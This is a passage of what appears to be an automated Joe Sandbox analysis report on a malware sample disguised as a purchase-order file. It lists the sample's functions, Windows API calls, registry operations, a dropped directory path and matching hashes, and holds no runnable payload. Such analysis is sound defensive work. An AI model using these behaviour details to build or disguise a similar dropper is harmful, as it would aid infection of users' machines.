                                                                        • Part of subcall function 00405817: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,?,00405883,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                        • Part of subcall function 004053EB: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,00000000,00000000,000000F0), ref: 00401634
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 00401629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                      • API String ID: 1892508949-1484825760
                                                                      • Opcode ID: 396cb8d654c4bd1d9b031a888da28658032143c202452067c1c7f2463867fd2c
                                                                      • Instruction ID: 6ea9d176647784ede47dca84986b1d8040ea6f7a989068fde2debc666839409d
                                                                      • Opcode Fuzzy Hash: 396cb8d654c4bd1d9b031a888da28658032143c202452067c1c7f2463867fd2c
                                                                      • Instruction Fuzzy Hash: A2112B35404141ABDF217B650C405BF27F0EA92315738463FF591B22E2C63C0942A63F
                                                                      Function 0040549D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                      • CloseHandle.KERNEL32(?), ref: 004054D3
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004054B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                      • Instruction ID: 542db3fa263e6c3fd8363e81c561fcb1d1edc85eb607383f0aa2fc0e1be44d1e
                                                                      • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                      • Instruction Fuzzy Hash: 95E0BFF4A002097FEB10AB64ED45F7B7BACEB00645F108561FD10F6190D674A9549A79
                                                                      Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                        • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                        • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                        • Part of subcall function 0040549D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                        • Part of subcall function 0040549D: CloseHandle.KERNEL32(?), ref: 004054D3
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 3521207402-0
                                                                      • Opcode ID: 5300586a977f739bb3b95f406a8e475e6bf3f04e18eaf9760632a053cb3b61ce
                                                                      • Instruction ID: f3d89628ed1a2f536a51da31c0d1f3bff78da2cc26dd4d815c67a837da1bf94c
                                                                      • Opcode Fuzzy Hash: 5300586a977f739bb3b95f406a8e475e6bf3f04e18eaf9760632a053cb3b61ce
                                                                      • Instruction Fuzzy Hash: 53016D31904114EBDF11AFA1CD89A9E7B72EF00344F10817BF601B52E1C7789A819B9A
                                                                      Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024C3
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 167947723-0
                                                                      • Opcode ID: cb8d7e7e292cd3f0bc6c1f59dcd71b3952a721e666c2518bc090900559d161d0
                                                                      • Instruction ID: 6b9a29d885729d806435ba0af982d5db400a82278970f5f8cd94cba27a839736
                                                                      • Opcode Fuzzy Hash: cb8d7e7e292cd3f0bc6c1f59dcd71b3952a721e666c2518bc090900559d161d0
                                                                      • Instruction Fuzzy Hash: EDF0AD72904200AFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B849449A7A
                                                                      Function 00401DEA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,?), ref: 00401E30
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes, xrefs: 00401E1B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ExecuteShell
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                      • API String ID: 587946157-1484825760
                                                                      • Opcode ID: b0f1f290dab42d7627ac84af391824cda61e1d1b78d8d453e3c5aed2a9c0ee07
                                                                      • Instruction ID: 340d0feeeb8292155287dfb6c97f983a5cfd8bfca1fa3215745e1e0026b9813b
                                                                      • Opcode Fuzzy Hash: b0f1f290dab42d7627ac84af391824cda61e1d1b78d8d453e3c5aed2a9c0ee07
                                                                      • Instruction Fuzzy Hash: 6BF04632B041006FDB10ABB18D4AF5E27A8AB61319F20493BF141F70C2DAFC88419B18
                                                                      Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 5036ecff7da7e931cef0e4d9af925887b92852862d1d3796e4000a238184e6f1
                                                                      • Instruction ID: 3b61e3a0dd356b8eb8c6217664be55b6a4c5c12d426b24930886ed9b9a2887e1
                                                                      • Opcode Fuzzy Hash: 5036ecff7da7e931cef0e4d9af925887b92852862d1d3796e4000a238184e6f1
                                                                      • Instruction Fuzzy Hash: 5911A771905205EFDF14DF64CA889AEBBB4EF11348F20443FE141B62C0D2B84A45DB5A
                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                      • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                                      • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                      • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                                      Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402327
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID:
                                                                      • API String ID: 849931509-0
                                                                      • Opcode ID: 48c6a4f1ec7a86bc1051c3bdbeac554186010e92678d5b1d819c5a0f771793f2
                                                                      • Instruction ID: 97ae11083f28a0faafd94fb7fe42009bced1e39793468f635283aee611ee1e77
                                                                      • Opcode Fuzzy Hash: 48c6a4f1ec7a86bc1051c3bdbeac554186010e92678d5b1d819c5a0f771793f2
                                                                      • Instruction Fuzzy Hash: A2F04433A00110AFEB10BBA48A4EAAE7269AB50344F14443BF201B61C1DABD4D12966D
                                                                      Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(00010432), ref: 00401579
                                                                      • ShowWindow.USER32(0001042C), ref: 0040158E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 58339daa48f2abfaa16ef55595ad2450e584a2864855a69756b41114902e3615
                                                                      • Instruction ID: 8b304e13c4ff4e58b2746d459b27b343ece49c0a97bab20a5a043a2c5b6af2c1
                                                                      • Opcode Fuzzy Hash: 58339daa48f2abfaa16ef55595ad2450e584a2864855a69756b41114902e3615
                                                                      • Instruction Fuzzy Hash: DEF0E577A082905FEB15CB64EDC086D7BF2EB8631075445BBD101A3691C2785C08C728
                                                                      Function 004060A5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                        • Part of subcall function 00406037: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
                                                                        • Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
                                                                        • Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction ID: 3e97459997e7f7d7039c0cd31b40a13ca7cd82e20333033f2d5c91e802436a08
                                                                      • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
